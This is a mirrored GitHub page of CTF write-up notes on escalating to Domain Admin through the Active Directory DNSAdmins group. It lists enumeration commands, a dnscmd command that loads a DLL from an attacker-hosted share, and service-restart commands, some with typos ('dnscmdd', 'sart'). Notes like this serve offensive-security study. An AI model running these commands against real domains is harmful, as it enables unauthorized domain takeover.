Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-26 13:40:20 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/Active Directory/Domain Privilege Escalation/5-DNSAdmin.md

39 lines
759 B
Markdown
Raw Normal View History

Add files via upload
2021-12-09 12:11:17 +00:00
# Domain Enumeration - DNSAdmins
Members of `DNSAdmins` could load arbitary DLL with the privileges of dns.exe , if Domain Controller (DC) servers as DNS , we can perform escalation to Domain Admins (DA)
## Powerview
### Enumerate members of DNSAdmins group
```
Get-NetGroupMember -GroupName "DNSAdmins"
```
## AD Module
### Enumerate members of DNSAdmins group
```
Get-ADGroupMember -Identity DNSAdmins
```
### Configure DLL using `dnscmd.exe`
```
dnscmdd dc-name or 127.0.0.1 /config /serverlevelplugindll \\your_attacker_ip\dll\mimilib.dll
```
### Restart dns service
```
sc.exe stop dns
sc.exe sart dns
```
Or alternatively follow this
https://medium.com/r3d-buck3t/escalating-privileges-with-dnsadmins-group-active-directory-6f7adbc7005b
Reference in a new issue Copy permalink